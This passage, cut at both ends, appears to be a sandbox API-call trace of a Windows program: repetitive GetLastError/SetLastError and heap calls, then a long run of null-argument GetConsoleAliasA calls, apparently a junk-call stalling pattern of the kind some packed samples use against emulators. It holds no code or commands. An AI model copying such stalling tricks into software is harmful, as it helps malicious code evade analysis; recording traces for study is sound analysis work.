(dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.302] SetLastError (dwErrCode=0x0) [0122.302] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] GetLastError () returned 0x0 [0122.303] SetLastError (dwErrCode=0x0) [0122.303] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x33) returned 0x5a19b0 [0122.303] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.304] SetLastError (dwErrCode=0x0) [0122.304] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.305] GetLastError () returned 0x0 [0122.305] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.306] SetLastError (dwErrCode=0x0) [0122.306] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.307] GetLastError () returned 0x0 [0122.307] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x98) returned 0x5a19f0 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1f) returned 0x5a1a90 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2b) returned 0x5a1ab8 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x37) returned 0x5a1af0 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5a1b30 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5a1b78 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a1bb8 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5a1bd8 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x14) returned 0x5a1c08 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xd) returned 0x5a1c28 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1a) returned 0x5a1c40 [0122.308] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5a1c68 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x19) returned 0x5a1ca0 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5a1cc8 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe) returned 0x5a1ce8 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x95) returned 0x5a1d00 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3e) returned 0x5a1da0 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1b) returned 0x5a1de8 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1d) returned 0x5a1e10 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5a1e38 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5a1e88 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a1ea8 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1b) returned 0x5a1ec8 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5a1ef0 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5a1f20 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5a1f58 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x69) returned 0x5a1f80 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5a1ff8 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xf) returned 0x5a2018 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x16) returned 0x5a2030 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5a2050 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5a2088 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x16) returned 0x5a20c0 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x13) returned 0x5a20e0 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1f) returned 0x5a2100 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5a2128 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a2148 [0122.309] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x46) returned 0x5a2168 [0122.320] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a11f8 | out: hHeap=0x5a0000) returned 1 [0122.320] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x769b0000 [0122.320] GetProcAddress (hModule=0x769b0000, lpProcName="IsProcessorFeaturePresent") returned 0x769c51ed [0122.320] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0122.321] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5a21b8 [0122.321] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x80) returned 0x5a11f8 [0122.321] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x408c11) returned 0x0 [0122.321] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a11f8) returned 0x80 [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.322] GetLastError () returned 0x0 [0122.322] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.323] GetLastError () returned 0x0 [0122.323] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.324] SetLastError (dwErrCode=0x0) [0122.324] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.325] SetLastError (dwErrCode=0x0) [0122.325] GetLastError () returned 0x0 [0122.326] SetLastError (dwErrCode=0x0) [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.326] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.327] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.328] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, 